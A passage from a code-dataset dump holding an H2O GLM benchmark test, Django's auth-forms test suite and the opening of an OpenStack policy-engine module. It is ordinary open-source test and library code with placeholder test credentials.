repo_name (string, 6-100 chars) | path (string, 4-294 chars) | copies (string, 1-5 chars) | size (string, 4-6 chars) | content (string, 606-896k chars) | license (string, 15 classes)
---|---|---|---|---|---|
eg-zhang/h2o-2 | py/testdir_multi_jvm/test_GLM2_covtype_exec.py | 9 | 2344 | import unittest, time, sys, random
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_cmd, h2o_glm, h2o_import as h2i
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
h2o.init(3,java_heap_GB=4)
@classmethod
def tearDownClass(cls):
h2o.tear_down_cloud()
def test_GLM2_covtype_exec(self):
csvFilename = 'covtype.data'
csvPathname = 'standard/' + csvFilename
hex_key = 'covtype.hex'
parseResult = h2i.import_parse(bucket='home-0xdiag-datasets', path=csvPathname, schema='put',
hex_key=hex_key, timeoutSecs=30)
inspect = h2o_cmd.runInspect(None, parseResult['destination_key'])
print "\n" + csvPathname, \
" numRows:", "{:,}".format(inspect['numRows']), \
" numCols:", "{:,}".format(inspect['numCols'])
print "WARNING: max_iter set to 8 for benchmark comparisons"
max_iter = 8
y = "54"
h2o_cmd.runExec(str='%s[,55] = %s[,55]==1' % (hex_key, hex_key))
# L2
kwargs = {
'response': y,
'family': 'binomial',
'n_folds': 0,
'max_iter': max_iter,
'beta_epsilon': 1e-3}
timeoutSecs = 120
start = time.time()
kwargs.update({'alpha': 0, 'lambda': 0})
glm = h2o_cmd.runGLM(parseResult=parseResult, timeoutSecs=timeoutSecs, **kwargs)
print "glm (L2) end on ", csvPathname, 'took', time.time() - start, 'seconds'
h2o_glm.simpleCheckGLM(self, glm, 'C14', **kwargs)
# Elastic
kwargs.update({'alpha': 0.5, 'lambda': 1e-4})
start = time.time()
glm = h2o_cmd.runGLM(parseResult=parseResult, timeoutSecs=timeoutSecs, **kwargs)
print "glm (Elastic) end on ", csvPathname, 'took', time.time() - start, 'seconds'
h2o_glm.simpleCheckGLM(self, glm, 'C14', **kwargs)
# L1
kwargs.update({'alpha': 1, 'lambda': 1e-4})
start = time.time()
glm = h2o_cmd.runGLM(parseResult=parseResult, timeoutSecs=timeoutSecs, **kwargs)
print "glm (L1) end on ", csvPathname, 'took', time.time() - start, 'seconds'
h2o_glm.simpleCheckGLM(self, glm, 'C14', **kwargs)
if __name__ == '__main__':
h2o.unit_main()
| apache-2.0 |
avneesh91/django | tests/auth_tests/test_forms.py | 15 | 34291 | import datetime
import re
from unittest import mock
from django import forms
from django.contrib.auth.forms import (
AdminPasswordChangeForm, AuthenticationForm, PasswordChangeForm,
PasswordResetForm, ReadOnlyPasswordHashField, ReadOnlyPasswordHashWidget,
SetPasswordForm, UserChangeForm, UserCreationForm,
)
from django.contrib.auth.models import User
from django.contrib.auth.signals import user_login_failed
from django.contrib.sites.models import Site
from django.core import mail
from django.core.mail import EmailMultiAlternatives
from django.forms.fields import CharField, Field, IntegerField
from django.test import SimpleTestCase, TestCase, override_settings
from django.utils import translation
from django.utils.text import capfirst
from django.utils.translation import gettext as _
from .models.custom_user import (
CustomUser, CustomUserWithoutIsActiveField, ExtensionUser,
)
from .models.with_custom_email_field import CustomEmailField
from .models.with_integer_username import IntegerUsernameUser
from .settings import AUTH_TEMPLATES
class TestDataMixin:
@classmethod
def setUpTestData(cls):
cls.u1 = User.objects.create_user(username='testclient', password='password', email='[email protected]')
cls.u2 = User.objects.create_user(username='inactive', password='password', is_active=False)
cls.u3 = User.objects.create_user(username='staff', password='password')
cls.u4 = User.objects.create(username='empty_password', password='')
cls.u5 = User.objects.create(username='unmanageable_password', password='$')
cls.u6 = User.objects.create(username='unknown_password', password='foo$bar')
class UserCreationFormTest(TestDataMixin, TestCase):
def test_user_already_exists(self):
data = {
'username': 'testclient',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["username"].errors,
[str(User._meta.get_field('username').error_messages['unique'])])
def test_invalid_data(self):
data = {
'username': 'jsmith!',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
validator = next(v for v in User._meta.get_field('username').validators if v.code == 'invalid')
self.assertEqual(form["username"].errors, [str(validator.message)])
def test_password_verification(self):
# The verification password is incorrect.
data = {
'username': 'jsmith',
'password1': 'test123',
'password2': 'test',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["password2"].errors,
[str(form.error_messages['password_mismatch'])])
def test_both_passwords(self):
# One (or both) passwords weren't given
data = {'username': 'jsmith'}
form = UserCreationForm(data)
required_error = [str(Field.default_error_messages['required'])]
self.assertFalse(form.is_valid())
self.assertEqual(form['password1'].errors, required_error)
self.assertEqual(form['password2'].errors, required_error)
data['password2'] = 'test123'
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['password1'].errors, required_error)
self.assertEqual(form['password2'].errors, [])
@mock.patch('django.contrib.auth.password_validation.password_changed')
def test_success(self, password_changed):
# The success case.
data = {
'username': '[email protected]',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertTrue(form.is_valid())
form.save(commit=False)
self.assertEqual(password_changed.call_count, 0)
u = form.save()
self.assertEqual(password_changed.call_count, 1)
self.assertEqual(repr(u), '<User: [email protected]>')
def test_unicode_username(self):
data = {
'username': '宝',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertTrue(form.is_valid())
u = form.save()
self.assertEqual(u.username, '宝')
def test_normalize_username(self):
# The normalization happens in AbstractBaseUser.clean() and ModelForm
# validation calls Model.clean().
ohm_username = 'testΩ' # U+2126 OHM SIGN
data = {
'username': ohm_username,
'password1': 'pwd2',
'password2': 'pwd2',
}
form = UserCreationForm(data)
self.assertTrue(form.is_valid())
user = form.save()
self.assertNotEqual(user.username, ohm_username)
self.assertEqual(user.username, 'testΩ') # U+03A9 GREEK CAPITAL LETTER OMEGA
def test_duplicate_normalized_unicode(self):
"""
To prevent almost identical usernames that are visually identical but
differ only in their Unicode code points, Unicode NFKC normalization
should make them appear equal to Django.
"""
omega_username = 'iamtheΩ' # U+03A9 GREEK CAPITAL LETTER OMEGA
ohm_username = 'iamtheΩ' # U+2126 OHM SIGN
self.assertNotEqual(omega_username, ohm_username)
User.objects.create_user(username=omega_username, password='pwd')
data = {
'username': ohm_username,
'password1': 'pwd2',
'password2': 'pwd2',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(
form.errors['username'], ["A user with that username already exists."]
)
@override_settings(AUTH_PASSWORD_VALIDATORS=[
{'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator'},
{'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', 'OPTIONS': {
'min_length': 12,
}},
])
def test_validates_password(self):
data = {
'username': 'testclient',
'password1': 'testclient',
'password2': 'testclient',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(len(form['password2'].errors), 2)
self.assertIn('The password is too similar to the username.', form['password2'].errors)
self.assertIn(
'This password is too short. It must contain at least 12 characters.',
form['password2'].errors
)
def test_custom_form(self):
class CustomUserCreationForm(UserCreationForm):
class Meta(UserCreationForm.Meta):
model = ExtensionUser
fields = UserCreationForm.Meta.fields + ('date_of_birth',)
data = {
'username': 'testclient',
'password1': 'testclient',
'password2': 'testclient',
'date_of_birth': '1988-02-24',
}
form = CustomUserCreationForm(data)
self.assertTrue(form.is_valid())
def test_custom_form_with_different_username_field(self):
class CustomUserCreationForm(UserCreationForm):
class Meta(UserCreationForm.Meta):
model = CustomUser
fields = ('email', 'date_of_birth')
data = {
'email': '[email protected]',
'password1': 'testclient',
'password2': 'testclient',
'date_of_birth': '1988-02-24',
}
form = CustomUserCreationForm(data)
self.assertTrue(form.is_valid())
def test_custom_form_hidden_username_field(self):
class CustomUserCreationForm(UserCreationForm):
class Meta(UserCreationForm.Meta):
model = CustomUserWithoutIsActiveField
fields = ('email',) # without USERNAME_FIELD
data = {
'email': '[email protected]',
'password1': 'testclient',
'password2': 'testclient',
}
form = CustomUserCreationForm(data)
self.assertTrue(form.is_valid())
def test_password_whitespace_not_stripped(self):
data = {
'username': 'testuser',
'password1': ' testpassword ',
'password2': ' testpassword ',
}
form = UserCreationForm(data)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['password1'], data['password1'])
self.assertEqual(form.cleaned_data['password2'], data['password2'])
@override_settings(AUTH_PASSWORD_VALIDATORS=[
{'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator'},
])
def test_password_help_text(self):
form = UserCreationForm()
self.assertEqual(
form.fields['password1'].help_text,
"<ul><li>Your password can't be too similar to your other personal information.</li></ul>"
)
# To verify that the login form rejects inactive users, use an authentication
# backend that allows them.
@override_settings(AUTHENTICATION_BACKENDS=['django.contrib.auth.backends.AllowAllUsersModelBackend'])
class AuthenticationFormTest(TestDataMixin, TestCase):
def test_invalid_username(self):
# The user submits an invalid username.
data = {
'username': 'jsmith_does_not_exist',
'password': 'test123',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(
form.non_field_errors(), [
form.error_messages['invalid_login'] % {
'username': User._meta.get_field('username').verbose_name
}
]
)
def test_inactive_user(self):
# The user is inactive.
data = {
'username': 'inactive',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(), [str(form.error_messages['inactive'])])
def test_login_failed(self):
signal_calls = []
def signal_handler(**kwargs):
signal_calls.append(kwargs)
user_login_failed.connect(signal_handler)
fake_request = object()
try:
form = AuthenticationForm(fake_request, {
'username': 'testclient',
'password': 'incorrect',
})
self.assertFalse(form.is_valid())
self.assertIs(signal_calls[0]['request'], fake_request)
finally:
user_login_failed.disconnect(signal_handler)
def test_inactive_user_i18n(self):
with self.settings(USE_I18N=True), translation.override('pt-br', deactivate=True):
# The user is inactive.
data = {
'username': 'inactive',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(), [str(form.error_messages['inactive'])])
def test_custom_login_allowed_policy(self):
# The user is inactive, but our custom form policy allows them to log in.
data = {
'username': 'inactive',
'password': 'password',
}
class AuthenticationFormWithInactiveUsersOkay(AuthenticationForm):
def confirm_login_allowed(self, user):
pass
form = AuthenticationFormWithInactiveUsersOkay(None, data)
self.assertTrue(form.is_valid())
# If we want to disallow some logins according to custom logic,
# we should raise a django.forms.ValidationError in the form.
class PickyAuthenticationForm(AuthenticationForm):
def confirm_login_allowed(self, user):
if user.username == "inactive":
raise forms.ValidationError("This user is disallowed.")
raise forms.ValidationError("Sorry, nobody's allowed in.")
form = PickyAuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(), ['This user is disallowed.'])
data = {
'username': 'testclient',
'password': 'password',
}
form = PickyAuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(), ["Sorry, nobody's allowed in."])
def test_success(self):
# The success case
data = {
'username': 'testclient',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertTrue(form.is_valid())
self.assertEqual(form.non_field_errors(), [])
def test_unicode_username(self):
User.objects.create_user(username='Σαρα', password='pwd')
data = {
'username': 'Σαρα',
'password': 'pwd',
}
form = AuthenticationForm(None, data)
self.assertTrue(form.is_valid())
self.assertEqual(form.non_field_errors(), [])
def test_username_field_label(self):
class CustomAuthenticationForm(AuthenticationForm):
username = CharField(label="Name", max_length=75)
form = CustomAuthenticationForm()
self.assertEqual(form['username'].label, "Name")
def test_username_field_label_not_set(self):
class CustomAuthenticationForm(AuthenticationForm):
username = CharField()
form = CustomAuthenticationForm()
username_field = User._meta.get_field(User.USERNAME_FIELD)
self.assertEqual(form.fields['username'].label, capfirst(username_field.verbose_name))
def test_username_field_label_empty_string(self):
class CustomAuthenticationForm(AuthenticationForm):
username = CharField(label='')
form = CustomAuthenticationForm()
self.assertEqual(form.fields['username'].label, "")
def test_password_whitespace_not_stripped(self):
data = {
'username': 'testuser',
'password': ' pass ',
}
form = AuthenticationForm(None, data)
form.is_valid() # Not necessary to have valid credentials for the test.
self.assertEqual(form.cleaned_data['password'], data['password'])
@override_settings(AUTH_USER_MODEL='auth_tests.IntegerUsernameUser')
def test_integer_username(self):
class CustomAuthenticationForm(AuthenticationForm):
username = IntegerField()
user = IntegerUsernameUser.objects.create_user(username=0, password='pwd')
data = {
'username': 0,
'password': 'pwd',
}
form = CustomAuthenticationForm(None, data)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['username'], data['username'])
self.assertEqual(form.cleaned_data['password'], data['password'])
self.assertEqual(form.errors, {})
self.assertEqual(form.user_cache, user)
class SetPasswordFormTest(TestDataMixin, TestCase):
def test_password_verification(self):
# The two new passwords do not match.
user = User.objects.get(username='testclient')
data = {
'new_password1': 'abc123',
'new_password2': 'abc',
}
form = SetPasswordForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(
form["new_password2"].errors,
[str(form.error_messages['password_mismatch'])]
)
@mock.patch('django.contrib.auth.password_validation.password_changed')
def test_success(self, password_changed):
user = User.objects.get(username='testclient')
data = {
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = SetPasswordForm(user, data)
self.assertTrue(form.is_valid())
form.save(commit=False)
self.assertEqual(password_changed.call_count, 0)
form.save()
self.assertEqual(password_changed.call_count, 1)
@override_settings(AUTH_PASSWORD_VALIDATORS=[
{'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator'},
{'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', 'OPTIONS': {
'min_length': 12,
}},
])
def test_validates_password(self):
user = User.objects.get(username='testclient')
data = {
'new_password1': 'testclient',
'new_password2': 'testclient',
}
form = SetPasswordForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(len(form["new_password2"].errors), 2)
self.assertIn('The password is too similar to the username.', form["new_password2"].errors)
self.assertIn(
'This password is too short. It must contain at least 12 characters.',
form["new_password2"].errors
)
def test_password_whitespace_not_stripped(self):
user = User.objects.get(username='testclient')
data = {
'new_password1': ' password ',
'new_password2': ' password ',
}
form = SetPasswordForm(user, data)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['new_password1'], data['new_password1'])
self.assertEqual(form.cleaned_data['new_password2'], data['new_password2'])
@override_settings(AUTH_PASSWORD_VALIDATORS=[
{'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator'},
{'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', 'OPTIONS': {
'min_length': 12,
}},
])
def test_help_text_translation(self):
french_help_texts = [
'Votre mot de passe ne peut pas trop ressembler à vos autres informations personnelles.',
'Votre mot de passe doit contenir au minimum 12 caractères.',
]
form = SetPasswordForm(self.u1)
with translation.override('fr'):
html = form.as_p()
for french_text in french_help_texts:
self.assertIn(french_text, html)
class PasswordChangeFormTest(TestDataMixin, TestCase):
def test_incorrect_password(self):
user = User.objects.get(username='testclient')
data = {
'old_password': 'test',
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = PasswordChangeForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["old_password"].errors, [str(form.error_messages['password_incorrect'])])
def test_password_verification(self):
# The two new passwords do not match.
user = User.objects.get(username='testclient')
data = {
'old_password': 'password',
'new_password1': 'abc123',
'new_password2': 'abc',
}
form = PasswordChangeForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["new_password2"].errors, [str(form.error_messages['password_mismatch'])])
@mock.patch('django.contrib.auth.password_validation.password_changed')
def test_success(self, password_changed):
# The success case.
user = User.objects.get(username='testclient')
data = {
'old_password': 'password',
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = PasswordChangeForm(user, data)
self.assertTrue(form.is_valid())
form.save(commit=False)
self.assertEqual(password_changed.call_count, 0)
form.save()
self.assertEqual(password_changed.call_count, 1)
def test_field_order(self):
# Regression test - check the order of fields:
user = User.objects.get(username='testclient')
self.assertEqual(list(PasswordChangeForm(user, {}).fields), ['old_password', 'new_password1', 'new_password2'])
def test_password_whitespace_not_stripped(self):
user = User.objects.get(username='testclient')
user.set_password(' oldpassword ')
data = {
'old_password': ' oldpassword ',
'new_password1': ' pass ',
'new_password2': ' pass ',
}
form = PasswordChangeForm(user, data)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['old_password'], data['old_password'])
self.assertEqual(form.cleaned_data['new_password1'], data['new_password1'])
self.assertEqual(form.cleaned_data['new_password2'], data['new_password2'])
class UserChangeFormTest(TestDataMixin, TestCase):
def test_username_validity(self):
user = User.objects.get(username='testclient')
data = {'username': 'not valid'}
form = UserChangeForm(data, instance=user)
self.assertFalse(form.is_valid())
validator = next(v for v in User._meta.get_field('username').validators if v.code == 'invalid')
self.assertEqual(form["username"].errors, [str(validator.message)])
def test_bug_14242(self):
# A regression test, introduced by adding an optimization for the
# UserChangeForm.
class MyUserForm(UserChangeForm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['groups'].help_text = 'These groups give users different permissions'
class Meta(UserChangeForm.Meta):
fields = ('groups',)
# Just check we can create it
MyUserForm({})
def test_unusable_password(self):
user = User.objects.get(username='empty_password')
user.set_unusable_password()
user.save()
form = UserChangeForm(instance=user)
self.assertIn(_("No password set."), form.as_table())
def test_bug_17944_empty_password(self):
user = User.objects.get(username='empty_password')
form = UserChangeForm(instance=user)
self.assertIn(_("No password set."), form.as_table())
def test_bug_17944_unmanageable_password(self):
user = User.objects.get(username='unmanageable_password')
form = UserChangeForm(instance=user)
self.assertIn(_("Invalid password format or unknown hashing algorithm."), form.as_table())
def test_bug_17944_unknown_password_algorithm(self):
user = User.objects.get(username='unknown_password')
form = UserChangeForm(instance=user)
self.assertIn(_("Invalid password format or unknown hashing algorithm."), form.as_table())
def test_bug_19133(self):
"The change form does not return the password value"
# Use the form to construct the POST data
user = User.objects.get(username='testclient')
form_for_data = UserChangeForm(instance=user)
post_data = form_for_data.initial
# The password field should be readonly, so anything
# posted here should be ignored; the form will be
# valid, and give back the 'initial' value for the
# password field.
post_data['password'] = 'new password'
form = UserChangeForm(instance=user, data=post_data)
self.assertTrue(form.is_valid())
# original hashed password contains $
self.assertIn('$', form.cleaned_data['password'])
def test_bug_19349_bound_password_field(self):
user = User.objects.get(username='testclient')
form = UserChangeForm(data={}, instance=user)
# When rendering the bound password field,
# ReadOnlyPasswordHashWidget needs the initial
# value to render correctly
self.assertEqual(form.initial['password'], form['password'].value())
def test_custom_form(self):
class CustomUserChangeForm(UserChangeForm):
class Meta(UserChangeForm.Meta):
model = ExtensionUser
fields = ('username', 'password', 'date_of_birth',)
user = User.objects.get(username='testclient')
data = {
'username': 'testclient',
'password': 'testclient',
'date_of_birth': '1998-02-24',
}
form = CustomUserChangeForm(data, instance=user)
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(form.cleaned_data['username'], 'testclient')
self.assertEqual(form.cleaned_data['date_of_birth'], datetime.date(1998, 2, 24))
@override_settings(TEMPLATES=AUTH_TEMPLATES)
class PasswordResetFormTest(TestDataMixin, TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
# This cleanup is necessary because contrib.sites cache
# makes tests interfere with each other, see #11505
Site.objects.clear_cache()
def create_dummy_user(self):
"""
Create a user and return a tuple (user_object, username, email).
"""
username = 'jsmith'
email = '[email protected]'
user = User.objects.create_user(username, email, 'test123')
return (user, username, email)
def test_invalid_email(self):
data = {'email': 'not valid'}
form = PasswordResetForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['email'].errors, [_('Enter a valid email address.')])
def test_nonexistent_email(self):
"""
Test nonexistent email address. This should not fail because it would
expose information about registered users.
"""
data = {'email': '[email protected]'}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
self.assertEqual(len(mail.outbox), 0)
def test_cleaned_data(self):
(user, username, email) = self.create_dummy_user()
data = {'email': email}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
form.save(domain_override='example.com')
self.assertEqual(form.cleaned_data['email'], email)
self.assertEqual(len(mail.outbox), 1)
def test_custom_email_subject(self):
data = {'email': '[email protected]'}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
# Since we're not providing a request object, we must provide a
# domain_override to prevent the save operation from failing in the
# potential case where contrib.sites is not installed. Refs #16412.
form.save(domain_override='example.com')
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, 'Custom password reset on example.com')
def test_custom_email_constructor(self):
data = {'email': '[email protected]'}
class CustomEmailPasswordResetForm(PasswordResetForm):
def send_mail(self, subject_template_name, email_template_name,
context, from_email, to_email,
html_email_template_name=None):
EmailMultiAlternatives(
"Forgot your password?",
"Sorry to hear you forgot your password.",
None, [to_email],
['[email protected]'],
headers={'Reply-To': '[email protected]'},
alternatives=[
("Really sorry to hear you forgot your password.", "text/html")
],
).send()
form = CustomEmailPasswordResetForm(data)
self.assertTrue(form.is_valid())
# Since we're not providing a request object, we must provide a
# domain_override to prevent the save operation from failing in the
# potential case where contrib.sites is not installed. Refs #16412.
form.save(domain_override='example.com')
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, 'Forgot your password?')
self.assertEqual(mail.outbox[0].bcc, ['[email protected]'])
self.assertEqual(mail.outbox[0].content_subtype, "plain")
def test_preserve_username_case(self):
"""
Preserve the case of the user name (before the @ in the email address)
when creating a user (#5605).
"""
user = User.objects.create_user('forms_test2', '[email protected]', 'test')
self.assertEqual(user.email, '[email protected]')
user = User.objects.create_user('forms_test3', 'tesT', 'test')
self.assertEqual(user.email, 'tesT')
def test_inactive_user(self):
"""
Inactive user cannot receive password reset email.
"""
(user, username, email) = self.create_dummy_user()
user.is_active = False
user.save()
form = PasswordResetForm({'email': email})
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(len(mail.outbox), 0)
def test_unusable_password(self):
user = User.objects.create_user('testuser', '[email protected]', 'test')
data = {"email": "[email protected]"}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
user.set_unusable_password()
user.save()
form = PasswordResetForm(data)
# The form itself is valid, but no email is sent
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(len(mail.outbox), 0)
def test_save_plaintext_email(self):
"""
Test the PasswordResetForm.save() method with no html_email_template_name
parameter passed in.
Test to ensure original behavior is unchanged after the parameter was added.
"""
(user, username, email) = self.create_dummy_user()
form = PasswordResetForm({"email": email})
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0].message()
self.assertFalse(message.is_multipart())
self.assertEqual(message.get_content_type(), 'text/plain')
self.assertEqual(message.get('subject'), 'Custom password reset on example.com')
self.assertEqual(len(mail.outbox[0].alternatives), 0)
self.assertEqual(message.get_all('to'), [email])
self.assertTrue(re.match(r'^http://example.com/reset/[\w+/-]', message.get_payload()))
def test_save_html_email_template_name(self):
"""
Test the PasswordResetForm.save() method with html_email_template_name
parameter specified.
Test to ensure that a multipart email is sent with both text/plain
and text/html parts.
"""
(user, username, email) = self.create_dummy_user()
form = PasswordResetForm({"email": email})
self.assertTrue(form.is_valid())
form.save(html_email_template_name='registration/html_password_reset_email.html')
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(len(mail.outbox[0].alternatives), 1)
message = mail.outbox[0].message()
self.assertEqual(message.get('subject'), 'Custom password reset on example.com')
self.assertEqual(len(message.get_payload()), 2)
self.assertTrue(message.is_multipart())
self.assertEqual(message.get_payload(0).get_content_type(), 'text/plain')
self.assertEqual(message.get_payload(1).get_content_type(), 'text/html')
self.assertEqual(message.get_all('to'), [email])
self.assertTrue(re.match(r'^http://example.com/reset/[\w/-]+', message.get_payload(0).get_payload()))
self.assertTrue(re.match(
r'^<html><a href="http://example.com/reset/[\w/-]+/">Link</a></html>$',
message.get_payload(1).get_payload()
))
@override_settings(AUTH_USER_MODEL='auth_tests.CustomEmailField')
def test_custom_email_field(self):
email = '[email protected]'
CustomEmailField.objects.create_user('test name', 'test password', email)
form = PasswordResetForm({'email': email})
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(form.cleaned_data['email'], email)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].to, [email])
class ReadOnlyPasswordHashTest(SimpleTestCase):
def test_bug_19349_render_with_none_value(self):
# Rendering the widget with value set to None
# mustn't raise an exception.
widget = ReadOnlyPasswordHashWidget()
html = widget.render(name='password', value=None, attrs={})
self.assertIn(_("No password set."), html)
def test_readonly_field_has_changed(self):
field = ReadOnlyPasswordHashField()
self.assertFalse(field.has_changed('aaa', 'bbb'))
class AdminPasswordChangeFormTest(TestDataMixin, TestCase):
@mock.patch('django.contrib.auth.password_validation.password_changed')
def test_success(self, password_changed):
user = User.objects.get(username='testclient')
data = {
'password1': 'test123',
'password2': 'test123',
}
form = AdminPasswordChangeForm(user, data)
self.assertTrue(form.is_valid())
form.save(commit=False)
self.assertEqual(password_changed.call_count, 0)
form.save()
self.assertEqual(password_changed.call_count, 1)
def test_password_whitespace_not_stripped(self):
user = User.objects.get(username='testclient')
data = {
'password1': ' pass ',
'password2': ' pass ',
}
form = AdminPasswordChangeForm(user, data)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['password1'], data['password1'])
self.assertEqual(form.cleaned_data['password2'], data['password2'])
| bsd-3-clause |
vipulsabhaya/cue | cue/openstack/common/policy.py | 1 | 28680 | # Copyright (c) 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Common Policy Engine Implementation
Policies can be expressed in one of two forms: A list of lists, or a
string written in the new policy language.
In the list-of-lists representation, each check inside the innermost
list is combined as with an "and" conjunction--for that check to pass,
all the specified checks must pass. These innermost lists are then
combined as with an "or" conjunction. This is the original way of
expressing policies, but there now exists a new way: the policy
language.
In the policy language, each check is specified the same way as in the
list-of-lists representation: a simple "a:b" pair that is matched to
the correct code to perform that check. However, conjunction
operators are available, allowing for more expressiveness in crafting
policies.
As an example, take the following rule, expressed in the list-of-lists
representation::
[["role:admin"], ["project_id:%(project_id)s", "role:projectadmin"]]
In the policy language, this becomes::
role:admin or (project_id:%(project_id)s and role:projectadmin)
The policy language also has the "not" operator, allowing a richer
policy rule::
project_id:%(project_id)s and not role:dunce
It is possible to perform policy checks on the following user
attributes (obtained through the token): user_id, domain_id or
project_id::
domain_id:<some_value>
Attributes sent along with API calls can be used by the policy engine
(on the right side of the expression), by using the following syntax::
<some_value>:user.id
Contextual attributes of objects identified by their IDs are loaded
from the database. They are also available to the policy engine and
can be checked through the `target` keyword::
<some_value>:target.role.name
All these attributes (related to users, API calls, and context) can be
checked against each other or against constants, be it literals (True,
<a_number>) or strings.
Finally, two special policy checks should be mentioned; the policy
check "@" will always accept an access, and the policy check "!" will
always reject an access. (Note that if a rule is either the empty
list ("[]") or the empty string, this is equivalent to the "@" policy
check.) Of these, the "!" policy check is probably the most useful,
as it allows particular rules to be explicitly disabled.
"""
import abc
import ast
import os
import re
from oslo.config import cfg
from oslo.serialization import jsonutils
import six
import six.moves.urllib.parse as urlparse
import six.moves.urllib.request as urlrequest
from cue.openstack.common import fileutils
from cue.openstack.common._i18n import _, _LE, _LW
from cue.openstack.common import log as logging
policy_opts = [
cfg.StrOpt('policy_file',
default='policy.json',
help=_('The JSON file that defines policies.')),
cfg.StrOpt('policy_default_rule',
default='default',
help=_('Default rule. Enforced when a requested rule is not '
'found.')),
cfg.MultiStrOpt('policy_dirs',
default=['policy.d'],
help=_('Directories where policy configuration files are '
'stored')),
]
CONF = cfg.CONF
CONF.register_opts(policy_opts)
LOG = logging.getLogger(__name__)
_checks = {}
class PolicyNotAuthorized(Exception):
def __init__(self, rule):
msg = _("Policy doesn't allow %s to be performed.") % rule
super(PolicyNotAuthorized, self).__init__(msg)
class Rules(dict):
"""A store for rules. Handles the default_rule setting directly."""
@classmethod
def load_json(cls, data, default_rule=None):
"""Allow loading of JSON rule data."""
# Suck in the JSON data and parse the rules
rules = dict((k, parse_rule(v)) for k, v in
jsonutils.loads(data).items())
return cls(rules, default_rule)
def __init__(self, rules=None, default_rule=None):
"""Initialize the Rules store."""
super(Rules, self).__init__(rules or {})
self.default_rule = default_rule
def __missing__(self, key):
"""Implements the default rule handling."""
if isinstance(self.default_rule, dict):
raise KeyError(key)
# If the default rule isn't actually defined, do something
# reasonably intelligent
if not self.default_rule:
raise KeyError(key)
if isinstance(self.default_rule, BaseCheck):
return self.default_rule
# We need to check this or we can get infinite recursion
if self.default_rule not in self:
raise KeyError(key)
elif isinstance(self.default_rule, six.string_types):
return self[self.default_rule]
def __str__(self):
"""Dumps a string representation of the rules."""
# Start by building the canonical strings for the rules
out_rules = {}
for key, value in self.items():
# Use empty string for singleton TrueCheck instances
if isinstance(value, TrueCheck):
out_rules[key] = ''
else:
out_rules[key] = str(value)
# Dump a pretty-printed JSON representation
return jsonutils.dumps(out_rules, indent=4)
class Enforcer(object):
"""Responsible for loading and enforcing rules.
:param policy_file: Custom policy file to use; if none is
specified, `CONF.policy_file` will be
used.
:param rules: Default dictionary / Rules to use. It is only
considered at the first instantiation. If
`load_rules(True)`, `clear()` or `set_rules(True)`
is called, it will be overwritten.
:param default_rule: Default rule to use; CONF.policy_default_rule
will be used if none is specified.
:param use_conf: Whether to load rules from cache or config file.
"""
